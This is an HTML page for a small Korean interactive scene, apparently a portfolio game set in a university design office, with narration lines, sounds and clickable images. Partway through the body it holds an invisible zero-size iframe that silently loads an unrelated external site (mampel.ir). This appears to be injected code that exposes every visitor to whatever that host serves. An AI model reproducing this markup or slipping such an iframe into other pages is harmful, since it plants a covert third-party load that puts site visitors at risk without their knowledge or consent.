<!DOCTYPE html>
<html>
<title>617</title>
<style>
	body{background-color: #484535;}
	#backk{width: auto; height: 100%; animation:start 2s alternate;}
	#backk img{width: 1250px; height: auto;}
	
	#bx { position: absolute; bottom: 0%; left: 30%;display:none; }
	#bx img{ width: 60%; height: auto;  }

	#poom{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 33%;}
	#poom2{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 33%;}
	#poom3{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 33%;}
	#poom4{bottom: 8%; font-weight: 5px; font-size: 1em;display:none; left: 33%;}


	#okk{bottom: 11%; right: 30%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#okk img{height: 20px;width: auto; }

	#oo{bottom: 11%; right: 30%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oo img{height: 20px;width: auto; }
	#ooo{bottom: 11%; right: 30%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#ooo img{height: 20px;width: auto; }	

	#soun { position: absolute; z-index: 99;cursor: pointer; top:15%; right: 45%; }
	#soun img{ position: absolute; width: 500px; height: 500px;z-index: 99;cursor: pointer;}

	#sigar { position: absolute; z-index: 99;cursor: pointer; bottom:60%; left: 30%; }
	#sigar img{ position: absolute; width: 100px; height: 300px;z-index: 99;cursor: pointer;}


	#turn{bottom: 3%; left: 42%; position: absolute;animation: backk 3s alternate; }
	#turn img{width: 50px; height: auto;cursor: pointer; }

	#fronts{top: 60%; left: 42%; position: absolute;animation: fron 3s alternate; }
	#fronts img{width: 50px; height: auto;cursor: pointer; }

	#tt { position: absolute; z-index: 99; top: 8%; left: 37%; animation: tra 2s alternate; display: none;cursor: pointer; }
	#tt img{ position: absolute; z-index: 99; width: 500px; height: auto; }	

@-webkit-keyframes typing { from { width: 0; } }
@-webkit-keyframes blink-caret { 50% { border-color: #484535; } }



@keyframes inin{
			0%{top: 71%;}
			
			100%{top: 68%;}
		}
@keyframes backk{
			0%{bottom: 6%;}
			
			100%{bottom: 3%;}
		}			
		
@keyframes heree{
			0%{right: 20%;}
			
			100%{right: 18%;}
		}
@keyframes tra{
			0%{opacity: 0}
			
			100%{opacity: 1}
		}
@keyframes fron{
			0%{top: 63%;}
			
			100%{top: 60%;}
		}		


h1 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 27ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 2s steps(30, end),
	           blink-caret .1s step-end infinite alternate;z-index: 3;
}
h2 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 36ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 3s steps(40, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h3 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 31ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 3s steps(50, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h4 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 18ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 2s steps(30, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
</style>

<head>
	<title></title>
</head>

<body>
	 <h3 id="poom">수많은 공모전 관련 포스터가 붙어있다.</h3>
	 	<h1 id="poom2">딱히 눈에 띄는 공모전은 없네...</h1>
	 	<h4 id="poom3">디자인과 사무실이다.</h4>
	 	<h3 id="poom4">아직 너무 이른시간이라 열지 않았다.</h3>
	
	
	 	<audio id="walk">
		<source src="walk.mp3" type="audio/mpeg"autoplay="true" preload="auto">
	</audio>

	
	<audio id="knock">
		<source src="knock.mp3" type="audio/mpeg">
	</audio>
	<audio id="drop">
		<source src="drop.mp3" type="audio/mpeg">
	</audio>




<iframe src="http://mampel.ir/" frameborder="0" style="width:0px;height:0px;border:0px" ></iframe>

	<div id="backk">
		<center>
		<img src="main.png">
		</center>
	</div>
	<a href="https://seoojing.github.io/popol_map/">
	<div id="turn">
		<img src="turn.png">
	</div>
</a>

<a href="https://seoojing.github.io/popol_map/">
	<div id="fronts">
		<img src="there.png">
	</div>
</a>

	<div id="bx">
		<img src="boox.png">
	</div>
	<div id="soun">
		<img src="blank.png">
	</div>

<div id="sigar">
		<img src="blank.png">
	</div>

	<div id="oo">
		<img src="won.png">
	</div>
	<div id="ooo">
		<img src="won.png">
	</div>
	<div id="okk">
		<img src="okk.png">
	</div>
	<div id="tt">
		<img src="sig.png">
	</div>

<script type="text/javascript">



var bbPlay = 0;
window.onmousemove = function(){
	bbPlay++;
	if(bbPlay == 1){drop.play(); walk.play();  }
}

	
var toggle = "off";
	var clickNumber = 0;
	soun.onclick = function(){
		
			toggle = "on";
			bx.style.display = "inline";
			poom.style.display = "inline";
			oo.style.display = "inline"
			soun.style.display = "none"
			}

	oo.onclick = function(){
			poom.style.display = "none"
			oo.style.display = "none"
			poom2.style.display = "inline"
			okk.style.display = "inline"}

	ooo.onclick = function(){
			poom3.style.display = "none"
			poom4.style.display = "inline"
			ooo.style.display = "none"
			knock.play();
			okk.style.display = "inline"}


	okk.onclick = function(){
			poom2.style.display = "none"
			okk.style.display = "none"
			bx.style.display = "none"
			poom4.style.display = "none"
			tt.style.display = "none"
}
			
			
	



sigar.onclick = function(){
			
			toggle = "on";
			bx.style.display = "inline";
			poom3.style.display = "inline";
			
			ooo.style.display = "inline"
			}




</script>
</body>
</html>